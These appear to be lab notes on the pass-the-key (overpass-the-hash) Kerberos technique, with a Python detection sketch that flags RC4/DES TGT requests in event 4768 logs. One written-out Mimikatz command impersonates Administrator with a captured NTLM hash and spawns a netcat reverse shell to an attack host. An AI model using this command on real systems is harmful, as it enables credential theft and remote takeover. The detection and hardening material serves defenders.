See also: overpass-the-hash (same thing, different names)
During Kerberos authentication, a key derived from the user's NTLM hash is used to encrypt a timestamp. If the cached key can be captured with Mimikatz (sekurlsa::ekeys), sekurlsa::pth can be used with it to obtain a TGT or TGS.
Four algorithms are available (DES, AES128, AES256, RC4) though DES is disabled by default. If the captured key is RC4:
mimikatz # sekurlsa::pth /user:Administrator /domain:za.tryhackme.com /rc4:96ea24eff4dff1fbe13818fbf12ea7d8 /run:"c:\tools\nc64.exe -e cmd.exe <attack-host-ip> 5556"
Note that for compatibility reasons, the key used in RC4 encryption is actually the user's NTLM hash (i.e. without key derivation). Other password dumping / discovery methods may be useful if sekurlsa::ekeys does not return results.
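The point above (for RC4 the Kerberos "key" is the raw NTLM hash) is also what makes this technique visible to defenders: a TGT request whose encryption type is RC4 (0x17), for an account in a domain where AES is the norm, is the classic signal of an overpass-the-hash logon. The following is an added detection sketch, not code from the original notes, that scans Windows Security event 4768 records (TGT requested) and flags successful requests using RC4 or DES for accounts not on an allow-list. The event records, the allow-list and the account names are constructed; the field names (TargetUserName, IpAddress, TicketEncryptionType, Status) are the ones the 4768 event carries.

```python
# Added example: flag Kerberos TGT requests (Security event 4768) that used a
# weak encryption type. Sample events and allow-list below are constructed.

# TicketEncryptionType codes as logged in events 4768/4769.
ETYPE_NAMES = {
    0x01: "DES-CBC-CRC",
    0x03: "DES-CBC-MD5",
    0x11: "AES128-CTS-HMAC-SHA1-96",
    0x12: "AES256-CTS-HMAC-SHA1-96",
    0x17: "RC4-HMAC",
}
WEAK_ETYPES = {0x01, 0x03, 0x17}

# Constructed sample records, reduced to the 4768 fields the check needs.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "10.0.0.21",
     "TicketEncryptionType": 0x12, "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "Administrator", "IpAddress": "10.0.0.55",
     "TicketEncryptionType": 0x17, "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "IpAddress": "10.0.0.30",
     "TicketEncryptionType": 0x17, "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice", "IpAddress": "10.0.0.21",
     "TicketEncryptionType": 0x12, "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "10.0.0.22",
     "TicketEncryptionType": 0x17, "Status": "0x18"},  # pre-auth failed, not issued
]

# Constructed allow-list: accounts known to still require RC4 (legacy apps).
RC4_ALLOWED = {"svc_legacy"}


def weak_etype_tgt_requests(events, allowed=frozenset()):
    """Return one finding per successful 4768 whose ticket encryption type is
    RC4 or DES, for an account that is not on the allow-list."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4768:
            continue
        if ev.get("Status") != "0x0":  # only tickets that were actually issued
            continue
        etype = ev.get("TicketEncryptionType")
        if etype not in WEAK_ETYPES:
            continue
        user = ev.get("TargetUserName", "")
        if user in allowed:
            continue
        findings.append({
            "user": user,
            "source_ip": ev.get("IpAddress"),
            "etype": ETYPE_NAMES.get(etype, hex(etype)),
        })
    return findings


def sources_by_user(findings):
    """Group flagged source IPs per account; a privileged account requesting
    RC4 tickets from an unexpected host is the case to triage first."""
    grouped = {}
    for f in findings:
        grouped.setdefault(f["user"], set()).add(f["source_ip"])
    return grouped


if __name__ == "__main__":
    hits = weak_etype_tgt_requests(SAMPLE_EVENTS, RC4_ALLOWED)
    for f in hits:
        print(f"{f['user']} obtained a TGT with {f['etype']} from {f['source_ip']}")
    print(sources_by_user(hits))
```

The allow-list exists because some environments still have service accounts that legitimately negotiate RC4; everything else on an AES-capable domain should be treated as a downgrade worth investigating. Restricting accounts to AES (so that an RC4 request is refused rather than merely logged) is the corresponding hardening step.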